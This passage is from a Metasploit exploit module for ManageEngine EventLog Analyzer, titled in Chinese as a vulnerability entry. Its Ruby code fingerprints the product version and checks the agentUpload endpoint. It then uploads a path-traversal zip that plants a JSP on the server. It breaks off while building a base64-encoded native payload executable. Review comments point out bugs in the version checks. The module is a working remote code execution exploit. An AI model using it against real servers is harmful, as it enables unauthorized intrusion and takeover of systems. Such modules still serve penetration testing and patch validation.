ManageEngine EventLog Analyzer多个安全漏洞(2)


  def get_version
    # Fingerprint the major version from the index page banner.
    # Returns the captured digit as a String, or "0" when the page is not
    # reachable, does not answer 200, or carries no recognisable banner.
    # NOTE(review): the pattern captures exactly one digit, so a two-digit
    # major version would be reported as its first digit only.
    res = send_request_cgi(
      'uri'    => normalize_uri("event/index3.do"),
      'method' => 'GET'
    )

    return "0" unless res && res.code == 200

    if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
      Regexp.last_match(1)
    else
      "0"
    end
  end


  def check
    # Metasploit check routine: maps the banner digit from get_version onto a
    # CheckCode. Only digits "7".."9" are probed further; anything else is
    # reported as Safe.
    version = get_version
    # NOTE(review): get_version returns a String, so this is a lexicographic
    # comparison of a single digit, not a numeric range check.
    if version >= "7" and version <= "9"
      # version 7 to < 8.1 detection
      res = send_request_cgi({
        'uri'    => normalize_uri("event/agentUpload"),
        'method' => 'GET'
      })
      # A 405 on the legacy path is taken as the vulnerable endpoint answering
      # to a method it does not serve.
      if res and res.code == 405
        return Exploit::CheckCode::Appears
      end

# version 8.1+ detection
      res = send_request_cgi({
        'uri'    => normalize_uri("agentUpload"),
        'method' => 'GET'
      })
      # NOTE(review): `version` is a String here while 8 is an Integer, so
      # `version == 8` can never be true and this branch always falls through
      # to Detected; `version == "8"` is presumably what was intended.
      if res and res.code == 405 and version == 8
        return Exploit::CheckCode::Appears
      else
        # We can't be sure that it is vulnerable in version 9
        return Exploit::CheckCode::Detected
      end

else
      return Exploit::CheckCode::Safe
    end
  end


  # Packs +payload+ into a stored (uncompressed) zip entry named +target_path+
  # and POSTs it as a multipart/form-data upload to the agentUpload endpoint.
  # The endpoint path is chosen from @my_target (targets[1] uses the
  # "/event/agentUpload" form, every other target "agentUpload").
  #
  # +is_payload+ only controls whether status messages are printed; it does
  # not change the request.
  #
  # Returns true when the server answers 200 with an empty body (the only
  # response the code treats as success), false for any other outcome
  # including no response at all.
  def create_zip_and_upload(payload, target_path, is_payload = true)
    # Zipping with CM_STORE to avoid errors decompressing the zip
    # in the Java vulnerable application
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file(target_path, payload)

# Random form field and file names; the .zip suffix is fixed.
post_data = Rex::MIME::Message.new
    post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")

data = post_data.to_s

if is_payload
      print_status("#{peer} - Uploading payload...")
    end
    res = send_request_cgi({
      'uri'    => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
      'method' => 'POST',
      'data'  => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    })

# NOTE(review): a 200 with a non-empty body is treated as failure; a nil
# body would raise on .empty? rather than return false.
if res and res.code == 200 and res.body.empty?
      if is_payload
        print_status("#{peer} - Payload uploaded successfully")
      end
      # The cleanup path collapses the leading "../../" to "../" — presumably
      # to match where the server actually extracts the entry; verify against
      # the target's unpack directory.
      register_files_for_cleanup(target_path.gsub("../../", "../"))
      return true
    else
      return false
    end
  end


  # Resolves the 'Automatic' target to a concrete entry of +targets+.
  #
  # Returns the explicitly selected target when one was chosen; otherwise
  # targets[1] for version "7", targets[2] when the probe page reports
  # Windows, targets[3] when it reports anything else, targets[1] again when
  # the probe upload fails on version "8", and nil when no decision can be
  # made (upload failed on another version, or the probe page did not
  # answer 200).
  def pick_target
    return target if target.name != 'Automatic'

print_status("#{peer} - Determining target")

version = get_version

if version == "7"
      return targets[1]
    end

# Small JSP that prints os.name; used only to tell Windows from non-Windows.
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    target_dir = "../../webapps/event/"
    # Upload the probe with is_payload=false so no "Uploading payload" status
    # lines are printed for it.
    if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
      if version == "8"
        # Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
        return targets[1]
      end
      return nil
    end

res = send_request_cgi({
      'uri'    => normalize_uri(jsp_name),
      'method' => 'GET'
    })

if res and res.code == 200
      # .to_s guards against a nil body here (unlike the check in
      # create_zip_and_upload).
      if res.body.to_s =~ /Windows/
        return targets[2]
      else
        # assuming Linux
        return targets[3]
      end
    end

return nil
  end


  def generate_jsp_payload
    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
    exe = generate_payload_exe(opts)
    base64_exe = Rex::Text.encode_base64(exe)

native_payload_name = rand_text_alpha(rand(6)+3)
    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
